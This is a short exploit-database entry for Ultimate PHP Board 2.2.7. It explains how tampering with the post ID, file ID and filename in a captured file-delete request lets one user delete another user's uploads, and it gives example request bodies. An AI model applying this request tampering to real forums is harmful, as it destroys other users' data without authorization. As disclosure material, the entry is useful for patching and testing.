[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ultimate PHP Board 2.2.7 Broken Authentication and Session Management

Author
i2sec
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16144
Category
web applications
Date add
20-05-2011
Platform
php
# Exploit Title : Ultimate PHP Board 2.2.7 "Broken Authentication and Session Management"
# Date : 2011.05.17
# Author : i2sec - Gi bum Hong
# Software Link : http://sourceforge.net/projects/textmb/files/UPB/UPB%202.2.7/
# Version : 2.2.7
# Tested on : apache 2.2.14 | mysql 5.1.39 | php 5.2.12
 
This Vulnerabibity Web base on "Broken Authentication and Session Management".
This attack can delete another user's(ex.admin) upload file.
 
step1.
Analyze request message of file delete using Paros Tool.
ex) http-request-message body : ~&postid=2&~~&threadid=1&divname=1-1-2-attach&fileid=3&filename=file.txt~
 
step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~



#  0day.today [2024-12-24]  #